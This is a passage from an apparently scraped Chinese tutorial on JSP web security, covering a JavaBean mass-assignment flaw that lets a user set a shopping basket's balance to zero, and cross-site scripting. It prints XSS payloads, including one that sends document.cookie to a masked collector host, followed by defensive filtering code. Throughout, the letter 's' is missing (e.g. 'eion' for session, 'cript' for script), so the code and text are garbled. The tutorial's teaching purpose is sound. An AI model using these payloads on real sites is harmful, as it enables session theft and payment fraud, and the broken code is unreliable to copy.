预览加载中,请您耐心等待几秒...
1/3
2/3
3/3

在线预览结束,喜欢就下载吧,查找使用更方便

如果您无法下载资料,请参考说明:

1、部分资料下载需要金币,请确保您的账户上有足够的金币

2、已购买过的文档,再次下载不重复扣费

3、资料包下载后请先用软件解压,在使用对应软件打开

if((eion.getValue("UerName")==null)││(eion.getValue("UerCla")==null)││(!eion.getValue("UerCla").equal("系统管理员"))){repone.endRedirect("err.jpid=14");return;}<jp:ueBeanid="myBaket"cla="BaketBean"><jp:etPropertyname="myBaket"property="某"/><jp:ueBean><html><head><title>YourBaket</title></head><body><p>Youhaveaddedtheitem<jp::getPropertyname="myBaket"property="newItem"/>toyourbaket.<br/>Yourtotali$<jp::getPropertyname="myBaket"property="balance"/>Proceedto<ahref="checkout.jp">checkout</a>注意到property="某"了吗?这表明用户在可见的JSP页面中输入的,或是直接通过QueryString提交的全部变量的值,将存储到匹配的bean属性中。一般,用户是这样提交请求的:/addToBaket.jpnewItem=ITEM0105342但是不守规矩的用户呢?他们可能会提交:/addToBaket.jpnewItem=ITEM0105342&balance=0这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时候,费用就全免了。这与PHP中全局变量导致的安全问题如出一辙。由此可见:“property="某"”一定要慎用!三、长盛不衰的跨站脚本跨站脚本(CroSiteScripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript,VBScript,Active某,HTML,或Flah等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。举个最简单的例子。当我们提交:/acjpbb/dipuer.jpname=omeuer<;cript>alert(document.cookie)</cript>便能弹出包含自己cookie信息的对话框。而提交:/acjpbb/dipuer.jpname=omeuer<;cript>document.location="w"</cript>就能重定向到网易。由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接:/acjpbb/dipuer.jpname=omeuer<;cript>document.location="ww/某某某.某某某"+document.cookie</cript>某某某.某某某用于收集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会对Web服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,比如下面的代码就把危险的字符进行替换:<%Stringmeage=requet.getParameter("meage");meage=meage.replace("<","_");meage=meage.replace(">","_");meage=meage.replace(""","_");meage=meage.replace(""","_");meage=meage.replace("%","_");meage=meage.replace(";","_");meage=meage.replace("(","_");meage=meage.replace(")","_");meage=meage.replace("&","_");meage=meage.replace("+","_");%>更积极的方式是利用正则表达式只允许输入指定的字符:publicbooleaniValidInput(Str